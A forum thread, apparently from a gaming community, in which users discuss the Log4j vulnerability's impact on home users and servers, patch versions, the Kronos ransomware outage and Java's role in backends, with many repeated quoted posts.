1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?
2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?
3) How worried should we users be about getting our stuff hacked because of this?
1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.
2) It is possible for some one to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.
3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransom ware, and lockdown the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.
Well, that's just wonderful. Not mad about it, not anxious, just...
I'm kind of staggered that something like this could still have happened, in this day and age. It's like the perfect storm of vulnerabilities- it's easy to utilize, it's in pretty much fucking everything, and stopping it requires the IT people of pretty much everything to be able to find and install a patch or new version of this Java stuff by app/server/etc... and of course there's also a lot of stuff that's never going to get updated because people are lazy or it's active but no longer supported... and then of course there's an onus on users to install the patches for the stuff they have to serverside.
I'm just lucky I don't play Minecraft, I suppose. But god, all those poor IT people running on zero sleep and having to deal with and patch this and then deal with Patch Tuesday... I feel for them all. It's got to be hell for them.
I got what I needed to done, so I'm just going to take it easy till Monday, I think. Let another 24-36 hours go for more patches to be pushed and hoping the patches beat the exploiters and this doesn't erupt into something much worse.
Yeah it's not good. A few tech experts were calling this the biggest security issue of the past several years, a few even said decade.
This was entirely predictable, alas. Most businesses work on the basis that software projects can be “done”, rather than budgeting and planning for the ongoing maintenance that’s needed. And then outsource a lot of their work to open source projects, and don’t bother supporting them (either financially or via contributions of time). It’s no surprise that thins eventually go tits up - although this is an unusually big one.
Half of my time in a tech architect role seems to be working to convince the business that we really can’t just let their favourite product run forever with no further budget.
Can I ask a stupid question: wasn't everyone supposed to be moving away from Java, in general? Or was that only Flash?
I don't work in the Java ecosystem so I can't say for certain, but I feel like sentiment has certainly gone from "meh" to negative since Oracle change the licensing.
0
Options
SixCaches Tweets in the mainframe cyberhexRegistered Userregular
Java on the browser-side is long dead, applets in particular. It, and the JVM ecosystem (Scala, Kotlin, Clojure, …) is very healthy server-side, and it’s big on Android too. The JVM itself is superb, and Java - while dated - has really strong tooling and is often the “safe choice”. For the more adventurous Kotlin is a pretty good balance between Java and Scala.
I don’t think anyone uses the Oracle JVM anymore. It’s all OpenJDK. Likewise while GraalVM is neat, nobody wants Oracle’s tentacles anywhere near them.
Yeah, Java is used a ton in backends and has tons of notes of how to get it to scale. Also, it has material startup/efficiency advantages in serverless ecosystems, so it's likely here to stay, much to the chagrin of many.
0
Options
Inquisitor772 x Penny Arcade Fight Club ChampionA fixed point in space and timeRegistered Userregular
I remember back when I was in high school and people were telling me, "Java is the future!"
What they didn't tell me was that it was less like Star Trek and more like Mad Max.
Java's fine and there's nothing wrong with choosing it for a whole range of applications.
The issue here isn't with the language used, it's the commercial sectors reliance on OSS for fundamental portions of their software without supporting it's maintainers.
Java's fine and there's nothing wrong with choosing it for a whole range of applications.
The issue here isn't with the language used, it's the commercial sectors reliance on OSS for fundamental portions of their software without supporting it's maintainers.
While more Open Source support would be great, that would not have prevented the Log4J bug.
The fact that you can use JNDI to dynamically load missing classes from an external source combined with Log4J interpreting user input as a formatting string (A bad, bad idea) wasn't so much a "We have no funding for this" and more a "We didn't even realize this was a security issue, in hindsight, why do we allow this?"
Maybe more funding would've allowed more security audits, but my personal experience with VERY expensive, fully licensed and "supported" software;
I can tell you that proprietary shops mostly don't bother keeping their software up to date. Heck, I have 2 servers where the official policy is "Just...Sandbox them as completely as possible, if you could airgap, that would be great. Using them? Ooh... do you REALLY have to?"
They might want to sell you "The new completely rewritten version 2.56 Beta, that does about 40% of your current system, but it's shinier." It's full of bugs, but that's okay, it's BETA.
*Grumble Grumble*
So, heads up, we don't use Java, but... VmWare does, and it uses Log4J.
So, update your VmWare servers, peeps. Cause hackers can hack the hypervisor.
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. Basically if you're the IT guys working for Kronos and your whole network just got taken down by ransomware like this, you pray that it was some zero day like log4j because its really not your fault or anything you could do to stop it. It far beats the alternative that you fucked up somewhere.
More likely this is an attack like the DarkSide / Colonial Pipeline attack that has been in the works for months or longer. But it'll probably be a little while before there is a comprehensive forensic analysis of how these guys were breached.
On the plus side, our developers said we don't need to worry about log4j because the only applications using that library are on 1.2.15 which isn't named in the referenced vulnerability so they don't have to take any action. :bigfrown:
Java's fine and there's nothing wrong with choosing it for a whole range of applications.
The issue here isn't with the language used, it's the commercial sectors reliance on OSS for fundamental portions of their software without supporting it's maintainers.
While more Open Source support would be great, that would not have prevented the Log4J bug.
The fact that you can use JNDI to dynamically load missing classes from an external source combined with Log4J interpreting user input as a formatting string (A bad, bad idea) wasn't so much a "We have no funding for this" and more a "We didn't even realize this was a security issue, in hindsight, why do we allow this?"
Maybe more funding would've allowed more security audits, but my personal experience with VERY expensive, fully licensed and "supported" software;
I can tell you that proprietary shops mostly don't bother keeping their software up to date. Heck, I have 2 servers where the official policy is "Just...Sandbox them as completely as possible, if you could airgap, that would be great. Using them? Ooh... do you REALLY have to?"
They might want to sell you "The new completely rewritten version 2.56 Beta, that does about 40% of your current system, but it's shinier." It's full of bugs, but that's okay, it's BETA.
Yeah there are levels of "why do we even have this lever?" here. I honestly can't think of a single reason that a logging service should be dynamically loading classes specified by the logging string at all
Okay sure java is super enterprisey and the ability to do dependency injection of all kinds everywhere is sort of it's thing but in logs???
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Well, that explains why the time clocks at my workplace have been saying "Server Offline" since Thursday.
No matter where you go...there you are. ~ Buckaroo Banzai
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Well, that explains why the time clocks at my workplace have been saying "Server Offline" since Thursday.
yeah Kronos is kind of -THE- Time clock software for businesses. Ours has been down since late Saturday, and I know of several other companies in the same boat.
Nothing like Payroll getting fucked up right before Christmas huh?
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. Basically if you're the IT guys working for Kronos and your whole network just got taken down by ransomware like this, you pray that it was some zero day like log4j because its really not your fault or anything you could do to stop it. It far beats the alternative that you fucked up somewhere.
More likely this is an attack like the DarkSide / Colonial Pipeline attack that has been in the works for months or longer. But it'll probably be a little while before there is a comprehensive forensic analysis of how these guys were breached.
On the plus side, our developers said we don't need to worry about log4j because the only applications using that library are on 1.2.15 which isn't named in the referenced vulnerability so they don't have to take any action. :bigfrown:
Eh, maybe so. The timing of it was pretty damned suspicious, though.
I can has cheezburger, yes?
0
Options
BlackDragon480Bluster KerfuffleMaster of Windy ImportRegistered Userregular
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Well, that explains why the time clocks at my workplace have been saying "Server Offline" since Thursday.
yeah Kronos is kind of -THE- Time clock software for businesses. Ours has been down since late Saturday, and I know of several other companies in the same boat.
Nothing like Payroll getting fucked up right before Christmas huh?
Thankfully my workplace handles boatloads of financial transactions everyday and can easily have HR cut hardchecks calculated with manual time in sheets that we use everyday, even when Kronos is up and running (one of the few perks of direct government oversight that loves paper redundancies). But I know 90+% of places don't have the same luxury.
BlackDragon480 on
No matter where you go...there you are. ~ Buckaroo Banzai
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. Basically if you're the IT guys working for Kronos and your whole network just got taken down by ransomware like this, you pray that it was some zero day like log4j because its really not your fault or anything you could do to stop it. It far beats the alternative that you fucked up somewhere.
More likely this is an attack like the DarkSide / Colonial Pipeline attack that has been in the works for months or longer. But it'll probably be a little while before there is a comprehensive forensic analysis of how these guys were breached.
On the plus side, our developers said we don't need to worry about log4j because the only applications using that library are on 1.2.15 which isn't named in the referenced vulnerability so they don't have to take any action. :bigfrown:
Eh, maybe so. The timing of it was pretty damned suspicious, though.
I mean, they're a huge target as they're basically 2 of the top 5 timekeeping players combined AND they have a huge legacy footprint, so likely lots of workarounds/hardcoded passwords etc.
Log4j is possible, but just as likely it was a traditional attack on their home infrastructure.
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. Basically if you're the IT guys working for Kronos and your whole network just got taken down by ransomware like this, you pray that it was some zero day like log4j because its really not your fault or anything you could do to stop it. It far beats the alternative that you fucked up somewhere.
More likely this is an attack like the DarkSide / Colonial Pipeline attack that has been in the works for months or longer. But it'll probably be a little while before there is a comprehensive forensic analysis of how these guys were breached.
On the plus side, our developers said we don't need to worry about log4j because the only applications using that library are on 1.2.15 which isn't named in the referenced vulnerability so they don't have to take any action. :bigfrown:
Eh, maybe so. The timing of it was pretty damned suspicious, though.
I mean, they're a huge target as they're basically 2 of the top 5 timekeeping players combined AND they have a huge legacy footprint, so likely lots of workarounds/hardcoded passwords etc.
Log4j is possible, but just as likely it was a traditional attack on their home infrastructure.
I've worked with Kronos before and I expect it's this.
- the initial patch, 2.15-rc1 wasn't comprehensive. A second patch, 2.15-rc2, was released a couple days later and there's now a stable version, 2.16, that completely disables JNDI by default. Double check your versions if you've already patched
- bypasses have been found for most of the initially suggested mitigations, like upgrading JDK/jre or using command line flags. Gotta patch this one
- the initial patch, 2.15-rc1 wasn't comprehensive. A second patch, 2.15-rc2, was released a couple days later and there's now a stable version, 2.16, that completely disables JNDI by default. Double check your versions if you've already patched
- bypasses have been found for most of the initially suggested mitigations, like upgrading JDK/jre or using command line flags. Gotta patch this one
Also a reminder that if you've patched, that it doesn't mitigate any previous intrusion. If someone leveraged log4j vulnerabilities to drop a shell, then patching will only prevent someone from getting in via log4j in the future.
There are some rumblings and reports that malicious actors are already breaking into servers, setting up some nice, hidden backdoors, and then patching the servers on their way out so that no one thinks anything is wrong.
- the initial patch, 2.15-rc1 wasn't comprehensive. A second patch, 2.15-rc2, was released a couple days later and there's now a stable version, 2.16, that completely disables JNDI by default. Double check your versions if you've already patched
- bypasses have been found for most of the initially suggested mitigations, like upgrading JDK/jre or using command line flags. Gotta patch this one
Also a reminder that if you've patched, that it doesn't mitigate any previous intrusion. If someone leveraged log4j vulnerabilities to drop a shell, then patching will only prevent someone from getting in via log4j in the future.
There are some rumblings and reports that malicious actors are already breaking into servers, setting up some nice, hidden backdoors, and then patching the servers on their way out so that no one thinks anything is wrong.
A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.
A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.
I mean that's probably to be expected, but you got a link about that?
A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.
I mean that's probably to be expected, but you got a link about that?
Since there have been many cases of the flaw being exploited, it should be assumed that the flaw has already been exploited. You should check logs for any unusual activity before applying patches to fix the vulnerability.
It's worth noting that it was discovered because it was actively being used to exploit minecraft servers in the wild.
A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.
This is typically true of most exploits though. It's honestly to be expected.
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
*Grumble Grumble*
So, heads up, we don't use Java, but... VmWare does, and it uses Log4J.
So, update your VmWare servers, peeps. Cause hackers can hack the hypervisor.
Spent most of last week doing this. Worked 2 14 hour days. I'm not even on the server team!
What is the preferred way to format/wipe an old computer?
I have a gaming desktop that I don’t use anymore that I’d like like to wipe and then donate or give to family. It’s 7-ish years old and outdated for gaming but still beefy enough for most people’s uses.
0
Options
ShadowfireVermont, in the middle of nowhereRegistered Userregular
Just wipe it. Have Windows delete the partitions during setup and then do the install. You don't need to do much else if you're giving it to family.
Posts
Yeah it's not good. A few tech experts were calling this the biggest security issue of the past several years, a few even said decade.
PSN:Furlion
Half of my time in a tech architect role seems to be working to convince the business that we really can’t just let their favourite product run forever with no further budget.
I don't work in the Java ecosystem so I can't say for certain, but I feel like sentiment has certainly gone from "meh" to negative since Oracle change the licensing.
Java is everywhere.
I don’t think anyone uses the Oracle JVM anymore. It’s all OpenJDK. Likewise while GraalVM is neat, nobody wants Oracle’s tentacles anywhere near them.
What they didn't tell me was that it was less like Star Trek and more like Mad Max.
The issue here isn't with the language used, it's the commercial sectors reliance on OSS for fundamental portions of their software without supporting it's maintainers.
While more Open Source support would be great, that would not have prevented the Log4J bug.
The fact that you can use JNDI to dynamically load missing classes from an external source combined with Log4J interpreting user input as a formatting string (A bad, bad idea) wasn't so much a "We have no funding for this" and more a "We didn't even realize this was a security issue, in hindsight, why do we allow this?"
Maybe more funding would've allowed more security audits, but my personal experience with VERY expensive, fully licensed and "supported" software;
I can tell you that proprietary shops mostly don't bother keeping their software up to date. Heck, I have 2 servers where the official policy is "Just...Sandbox them as completely as possible, if you could airgap, that would be great. Using them? Ooh... do you REALLY have to?"
They might want to sell you "The new completely rewritten version 2.56 Beta, that does about 40% of your current system, but it's shinier." It's full of bugs, but that's okay, it's BETA.
So, heads up, we don't use Java, but... VmWare does, and it uses Log4J.
So, update your VmWare servers, peeps. Cause hackers can hack the hypervisor.
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.
Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.
According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.
Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.
…that’s pretty much admitting it was the log4j stuff without saying it, yeah?
The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.
I can has cheezburger, yes?
Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. Basically if you're the IT guys working for Kronos and your whole network just got taken down by ransomware like this, you pray that it was some zero day like log4j because its really not your fault or anything you could do to stop it. It far beats the alternative that you fucked up somewhere.
More likely this is an attack like the DarkSide / Colonial Pipeline attack that has been in the works for months or longer. But it'll probably be a little while before there is a comprehensive forensic analysis of how these guys were breached.
On the plus side, our developers said we don't need to worry about log4j because the only applications using that library are on 1.2.15 which isn't named in the referenced vulnerability so they don't have to take any action. :bigfrown:
Yeah there are levels of "why do we even have this lever?" here. I honestly can't think of a single reason that a logging service should be dynamically loading classes specified by the logging string at all
Okay sure java is super enterprisey and the ability to do dependency injection of all kinds everywhere is sort of it's thing but in logs???
Well, that explains why the time clocks at my workplace have been saying "Server Offline" since Thursday.
~ Buckaroo Banzai
yeah Kronos is kind of -THE- Time clock software for businesses. Ours has been down since late Saturday, and I know of several other companies in the same boat.
Nothing like Payroll getting fucked up right before Christmas huh?
Eh, maybe so. The timing of it was pretty damned suspicious, though.
I can has cheezburger, yes?
Thankfully my workplace handles boatloads of financial transactions everyday and can easily have HR cut hardchecks calculated with manual time in sheets that we use everyday, even when Kronos is up and running (one of the few perks of direct government oversight that loves paper redundancies). But I know 90+% of places don't have the same luxury.
~ Buckaroo Banzai
I mean, they're a huge target as they're basically 2 of the top 5 timekeeping players combined AND they have a huge legacy footprint, so likely lots of workarounds/hardcoded passwords etc.
Log4j is possible, but just as likely it was a traditional attack on their home infrastructure.
I've worked with Kronos before and I expect it's this.
- the initial patch, 2.15-rc1 wasn't comprehensive. A second patch, 2.15-rc2, was released a couple days later and there's now a stable version, 2.16, that completely disables JNDI by default. Double check your versions if you've already patched
- bypasses have been found for most of the initially suggested mitigations, like upgrading JDK/jre or using command line flags. Gotta patch this one
That aged well. I should know better by now. Mind, it’s not of the severity of the Log4J one, so I can still feel a little cocky.
Also a reminder that if you've patched, that it doesn't mitigate any previous intrusion. If someone leveraged log4j vulnerabilities to drop a shell, then patching will only prevent someone from getting in via log4j in the future.
There are some rumblings and reports that malicious actors are already breaking into servers, setting up some nice, hidden backdoors, and then patching the servers on their way out so that no one thinks anything is wrong.
Oh yeah this one's gonna be fun for a long time
I mean that's probably to be expected, but you got a link about that?
Unfortunately I heard it through word of mouth. Best I can find:
https://www.hipaajournal.com/max-severity-apache-log4j-zero-day-vulnerability-extensively-exploited-in-the-wild/
It's worth noting that it was discovered because it was actively being used to exploit minecraft servers in the wild.
Edit: this other article I found contradicts that so who knows:
https://www.techtarget.com/searchsecurity/news/252510892/Critical-Log4j-flaw-exploited-a-week-before-disclosure
This is typically true of most exploits though. It's honestly to be expected.
Cisco Talos Advisory
Steam | XBL
Spent most of last week doing this. Worked 2 14 hour days. I'm not even on the server team!
I have a gaming desktop that I don’t use anymore that I’d like like to wipe and then donate or give to family. It’s 7-ish years old and outdated for gaming but still beefy enough for most people’s uses.
https://www.eurogamer.net/articles/2022-02-28-nvidia-completely-compromised-by-cyber-attack
Con: all my home computers use NVidia…